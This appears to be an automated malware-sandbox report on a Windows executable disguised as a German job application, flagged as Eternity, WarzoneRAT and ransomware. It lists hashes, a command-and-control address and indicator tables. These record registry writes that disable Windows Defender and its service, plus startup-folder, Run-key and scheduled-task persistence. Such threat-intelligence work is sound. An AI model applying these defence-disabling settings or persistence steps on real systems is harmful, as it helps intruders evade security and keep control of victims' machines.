eternity | 58f6462c0225f4ec37209add8486ef9bdcdc1d1e766096af73b3c7797ebeadb1

Analysis

max time kernel
150s
max time network
146s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
19/10/2022, 02:40

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

Sandra-Wohl-Bewerbung-Arbeitszeugnis.exe
Size

99KB
MD5

2411437b7a8c5e897e974b5a33e67428
SHA1

00906dca6d4134495a95283cc2c5ac458f2891fd
SHA256

58f6462c0225f4ec37209add8486ef9bdcdc1d1e766096af73b3c7797ebeadb1
SHA512

de8a3052a58d6b66d2c4840cc829478d82b69d754f4d25101573593357a2af406d290f7749d4f74ebc9e4529b74a7f910f327efcb4f3a1dd27d73a66cce109e0
SSDEEP

1536:/7fbN3eEDhDPA/pICdUkbBtW7upvaLU0bI5taxKo0IOlnToIfPwNOpJ0HWIhOl:z7DhdC6kzWypvaQ0FxyNTBfP6OpH

Score

10^/10

eternity warzonerat evasion infostealer persistence ransomware rat trojan upx

Malware Config

Extracted

Family

warzonerat

111.90.151.174:5200

Signatures

Eternity
Eternity Project is a malware kit offering an info stealer, clipper, worm, coin miner, ransomware, and DDoS bot.
eternity

Modifies Windows Defender Real-time Protection settings 3 TTPs 64 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe

Modifies security service 2 TTPs 6 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"	reg.exe

WarzoneRat, AveMaria
WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.
rat infostealer warzonerat

Warzone RAT payload 3 IoCs

rat

resource	yara_rule
behavioral2/memory/4184-261-0x00000000034B0000-0x000000000360A000-memory.dmp	warzonerat
behavioral2/memory/4184-267-0x0000000002AB0000-0x00000000034B0000-memory.dmp	warzonerat
behavioral2/memory/2696-283-0x0000000002FB0000-0x000000000310A000-memory.dmp	warzonerat

Disables Task Manager via registry modification
evasion
Downloads MZ/PE file

Executes dropped EXE 56 IoCs

pid	Process
3536	dismhost.exe
4744	dismhost.exe
4648	dismhost.exe
4688	dismhost.exe
1084	dismhost.exe
2212	dismhost.exe
4184	5201.exe
2696	images.exe
4524	dismhost.exe
4656	dismhost.exe
8	dismhost.exe
2360	dismhost.exe
3608	dismhost.exe
2780	dismhost.exe
4708	dismhost.exe
1476	dismhost.exe
2260	dismhost.exe
3016	dismhost.exe
4136	dismhost.exe
3972	dismhost.exe
3932	dismhost.exe
624	dismhost.exe
4028	dismhost.exe
4872	dismhost.exe
2820	dismhost.exe
1840	dismhost.exe
1516	dismhost.exe
3464	dismhost.exe
2552	dismhost.exe
4136	dismhost.exe
228	dismhost.exe
4328	dismhost.exe
4600	dismhost.exe
2808	dismhost.exe
2760	dismhost.exe
4544	dismhost.exe
1432	dismhost.exe
4540	dismhost.exe
4764	dismhost.exe
4984	dismhost.exe
2544	dismhost.exe
3836	dismhost.exe
1440	dismhost.exe
2820	dismhost.exe
3640	dismhost.exe
1264	dismhost.exe
3976	dismhost.exe
4408	dismhost.exe
5080	dismhost.exe
4600	dismhost.exe
752	Ransomware.exe
3144	Ransomware.exe
936	schtasks.exe
4904	Ransomware.exe
3684	Ransomware.exe
3692	Ransomware.exe

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/4184-260-0x0000000000550000-0x000000000071E000-memory.dmp	upx
behavioral2/memory/4184-274-0x0000000000550000-0x000000000071E000-memory.dmp	upx
behavioral2/memory/2696-275-0x0000000000E40000-0x000000000100E000-memory.dmp	upx
behavioral2/memory/2696-293-0x0000000000E40000-0x000000000100E000-memory.dmp	upx

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	Ransomware.exe

Drops startup file 11 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\StartUp\part1.bat	cmd.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.bat:start	5201.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\StartUp\Ransomware.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\StartUp\Ransomware.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\StartUp\Ransomware.exe	cmd.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\StartUp\part1.bat	cmd.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.bat	5201.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\StartUp\Ransomware.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\StartUp\Ransomware.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\StartUp\Ransomware.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\StartUp\Ransomware.exe	cmd.exe

Loads dropped DLL 64 IoCs

pid	Process
3536	dismhost.exe
3536	dismhost.exe
4744	dismhost.exe
3536	dismhost.exe
4744	dismhost.exe
4688	dismhost.exe
4648	dismhost.exe
4688	dismhost.exe
3536	dismhost.exe
4648	dismhost.exe
3536	dismhost.exe
4688	dismhost.exe
4648	dismhost.exe
4648	dismhost.exe
4688	dismhost.exe
4648	dismhost.exe
4688	dismhost.exe
2212	dismhost.exe
4744	dismhost.exe
1084	dismhost.exe
1084	dismhost.exe
2212	dismhost.exe
4744	dismhost.exe
2212	dismhost.exe
1084	dismhost.exe
2212	dismhost.exe
4744	dismhost.exe
1084	dismhost.exe
2212	dismhost.exe
1084	dismhost.exe
4688	dismhost.exe
4688	dismhost.exe
3536	dismhost.exe
3536	dismhost.exe
4648	dismhost.exe
4648	dismhost.exe
4688	dismhost.exe
4688	dismhost.exe
3536	dismhost.exe
3536	dismhost.exe
4688	dismhost.exe
4688	dismhost.exe
3536	dismhost.exe
4688	dismhost.exe
3536	dismhost.exe
3536	dismhost.exe
4688	dismhost.exe
3536	dismhost.exe
3536	dismhost.exe
4688	dismhost.exe
3536	dismhost.exe
4688	dismhost.exe
3536	dismhost.exe
4688	dismhost.exe
3536	dismhost.exe
4688	dismhost.exe
4648	dismhost.exe
4648	dismhost.exe
4648	dismhost.exe
4648	dismhost.exe
4648	dismhost.exe
4648	dismhost.exe
4648	dismhost.exe
4648	dismhost.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Images = "C:\\Users\\Admin\\Documents\\images.exe"	5201.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wallpaper.bmp"	Ransomware.exe

Drops file in Windows directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Logs\DISM\dism.log	Dism.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	Dism.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	dismhost.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	dismhost.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	dismhost.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	Dism.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	dismhost.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	Dism.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	dismhost.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	Dism.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	Dism.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	dismhost.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	Dism.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	dismhost.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	dismhost.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	dismhost.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	Dism.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	Dism.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	dismhost.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	Dism.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	dismhost.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	dismhost.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	dismhost.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	dismhost.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	dismhost.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	dismhost.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	Dism.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	Dism.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	dismhost.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	Dism.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	Dism.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	dismhost.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	dismhost.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	Dism.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	Dism.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	dismhost.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	Dism.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	Dism.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	dismhost.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	dismhost.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	Dism.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	Dism.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	dismhost.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	dismhost.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	Dism.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	dismhost.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	dismhost.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	Dism.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	Dism.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	Dism.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	Dism.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	Dism.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	dismhost.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	Dism.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	dismhost.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	dismhost.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	Dism.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	Dism.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	Dism.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	dismhost.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	Dism.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	dismhost.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	dismhost.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	dismhost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
2220	schtasks.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
1696	taskkill.exe

Modifies Control Panel 2 IoCs

evasion

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\Desktop\WallpaperStyle = "10"	Ransomware.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\Desktop\TileWallpaper = "0"	Ransomware.exe

Modifies registry class 5 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\.ecrp	Ransomware.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\.ecrp\shell\open\command	Ransomware.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\.ecrp\shell	Ransomware.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\.ecrp\shell\open	Ransomware.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\.ecrp\shell\open\command\ = "C:\\configuration\\Ransomware.exe %1"	Ransomware.exe

NTFS ADS 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\Documents\Documents:ApplicationData	5201.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
3856	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3800	powershell.exe
3800	powershell.exe
3800	powershell.exe
1432	powershell.exe
1432	powershell.exe
1432	powershell.exe
4904	Ransomware.exe
4904	Ransomware.exe
4904	Ransomware.exe
4904	Ransomware.exe
4904	Ransomware.exe
4904	Ransomware.exe
4904	Ransomware.exe
4904	Ransomware.exe
4904	Ransomware.exe
4904	Ransomware.exe
4904	Ransomware.exe
4904	Ransomware.exe
4904	Ransomware.exe
4904	Ransomware.exe
4904	Ransomware.exe
4904	Ransomware.exe
4904	Ransomware.exe
4904	Ransomware.exe
4904	Ransomware.exe
4904	Ransomware.exe
4904	Ransomware.exe
4904	Ransomware.exe
4904	Ransomware.exe
4904	Ransomware.exe
4904	Ransomware.exe
4904	Ransomware.exe
4904	Ransomware.exe
4904	Ransomware.exe
4904	Ransomware.exe
4904	Ransomware.exe
4904	Ransomware.exe
4904	Ransomware.exe
4904	Ransomware.exe
4904	Ransomware.exe
4904	Ransomware.exe
4904	Ransomware.exe
4904	Ransomware.exe
4904	Ransomware.exe
4904	Ransomware.exe
4904	Ransomware.exe
4904	Ransomware.exe
4904	Ransomware.exe
4904	Ransomware.exe
4904	Ransomware.exe
4904	Ransomware.exe
4904	Ransomware.exe
4904	Ransomware.exe
4904	Ransomware.exe
4904	Ransomware.exe
4904	Ransomware.exe
4904	Ransomware.exe
4904	Ransomware.exe
4904	Ransomware.exe
4904	Ransomware.exe
4904	Ransomware.exe
4904	Ransomware.exe
4904	Ransomware.exe
4904	Ransomware.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1696	taskkill.exe
Token: SeDebugPrivilege	3800	powershell.exe
Token: SeBackupPrivilege	4264	Dism.exe
Token: SeRestorePrivilege	4264	Dism.exe
Token: SeBackupPrivilege	3972	Dism.exe
Token: SeRestorePrivilege	3972	Dism.exe
Token: SeBackupPrivilege	4284	Dism.exe
Token: SeRestorePrivilege	4284	Dism.exe
Token: SeBackupPrivilege	4640	Dism.exe
Token: SeRestorePrivilege	4640	Dism.exe
Token: SeBackupPrivilege	2508	Dism.exe
Token: SeRestorePrivilege	2508	Dism.exe
Token: SeBackupPrivilege	4672	Dism.exe
Token: SeRestorePrivilege	4672	Dism.exe
Token: SeBackupPrivilege	2308	Dism.exe
Token: SeRestorePrivilege	2308	Dism.exe
Token: SeBackupPrivilege	2364	Dism.exe
Token: SeRestorePrivilege	2364	Dism.exe
Token: SeBackupPrivilege	3772	Dism.exe
Token: SeRestorePrivilege	3772	Dism.exe
Token: SeBackupPrivilege	1260	Dism.exe
Token: SeRestorePrivilege	1260	Dism.exe
Token: SeBackupPrivilege	4044	Dism.exe
Token: SeRestorePrivilege	4044	Dism.exe
Token: SeBackupPrivilege	1748	Dism.exe
Token: SeRestorePrivilege	1748	Dism.exe
Token: SeBackupPrivilege	1652	Dism.exe
Token: SeRestorePrivilege	1652	Dism.exe
Token: SeBackupPrivilege	3600	Dism.exe
Token: SeRestorePrivilege	3600	Dism.exe
Token: SeDebugPrivilege	1432	powershell.exe
Token: SeBackupPrivilege	3004	Dism.exe
Token: SeRestorePrivilege	3004	Dism.exe
Token: SeBackupPrivilege	4868	Dism.exe
Token: SeRestorePrivilege	4868	Dism.exe
Token: SeBackupPrivilege	1104	Dism.exe
Token: SeRestorePrivilege	1104	Dism.exe
Token: SeBackupPrivilege	4616	Dism.exe
Token: SeRestorePrivilege	4616	Dism.exe
Token: SeBackupPrivilege	3692	Dism.exe
Token: SeRestorePrivilege	3692	Dism.exe
Token: SeBackupPrivilege	1276	Dism.exe
Token: SeRestorePrivilege	1276	Dism.exe
Token: SeBackupPrivilege	4776	Dism.exe
Token: SeRestorePrivilege	4776	Dism.exe
Token: SeBackupPrivilege	2992	Dism.exe
Token: SeRestorePrivilege	2992	Dism.exe
Token: SeBackupPrivilege	4664	Dism.exe
Token: SeRestorePrivilege	4664	Dism.exe
Token: SeBackupPrivilege	532	Dism.exe
Token: SeRestorePrivilege	532	Dism.exe
Token: SeBackupPrivilege	3444	Dism.exe
Token: SeRestorePrivilege	3444	Dism.exe
Token: SeBackupPrivilege	1456	Dism.exe
Token: SeRestorePrivilege	1456	Dism.exe
Token: SeBackupPrivilege	3292	Dism.exe
Token: SeRestorePrivilege	3292	Dism.exe
Token: SeBackupPrivilege	4248	Dism.exe
Token: SeRestorePrivilege	4248	Dism.exe
Token: SeBackupPrivilege	5116	Dism.exe
Token: SeRestorePrivilege	5116	Dism.exe
Token: SeBackupPrivilege	2148	Dism.exe
Token: SeRestorePrivilege	2148	Dism.exe
Token: SeBackupPrivilege	4108	Dism.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2696	images.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3628 wrote to memory of 4964	3628	Sandra-Wohl-Bewerbung-Arbeitszeugnis.exe	81
PID 3628 wrote to memory of 4964	3628	Sandra-Wohl-Bewerbung-Arbeitszeugnis.exe	81
PID 4964 wrote to memory of 3440	4964	cmd.exe	82
PID 4964 wrote to memory of 3440	4964	cmd.exe	82
PID 4964 wrote to memory of 3440	4964	cmd.exe	82
PID 3440 wrote to memory of 4544	3440	Sandra-Wohl-Bewerbung-Arbeitszeugnis.exe	84
PID 3440 wrote to memory of 4544	3440	Sandra-Wohl-Bewerbung-Arbeitszeugnis.exe	84
PID 4544 wrote to memory of 3036	4544	cmd.exe	85
PID 4544 wrote to memory of 3036	4544	cmd.exe	85
PID 4544 wrote to memory of 808	4544	cmd.exe	86
PID 4544 wrote to memory of 808	4544	cmd.exe	86
PID 4544 wrote to memory of 5092	4544	cmd.exe	87
PID 4544 wrote to memory of 5092	4544	cmd.exe	87
PID 4544 wrote to memory of 5068	4544	cmd.exe	88
PID 4544 wrote to memory of 5068	4544	cmd.exe	88
PID 4544 wrote to memory of 4688	4544	cmd.exe	89
PID 4544 wrote to memory of 4688	4544	cmd.exe	89
PID 4544 wrote to memory of 4736	4544	cmd.exe	90
PID 4544 wrote to memory of 4736	4544	cmd.exe	90
PID 4544 wrote to memory of 4628	4544	cmd.exe	91
PID 4544 wrote to memory of 4628	4544	cmd.exe	91
PID 4544 wrote to memory of 2180	4544	cmd.exe	92
PID 4544 wrote to memory of 2180	4544	cmd.exe	92
PID 4544 wrote to memory of 1696	4544	cmd.exe	93
PID 4544 wrote to memory of 1696	4544	cmd.exe	93
PID 4544 wrote to memory of 3444	4544	cmd.exe	94
PID 4544 wrote to memory of 3444	4544	cmd.exe	94
PID 4544 wrote to memory of 4100	4544	cmd.exe	95
PID 4544 wrote to memory of 4100	4544	cmd.exe	95
PID 4544 wrote to memory of 1424	4544	cmd.exe	98
PID 4544 wrote to memory of 1424	4544	cmd.exe	98
PID 4544 wrote to memory of 2708	4544	cmd.exe	100
PID 4544 wrote to memory of 2708	4544	cmd.exe	100
PID 4544 wrote to memory of 2148	4544	cmd.exe	101
PID 4544 wrote to memory of 2148	4544	cmd.exe	101
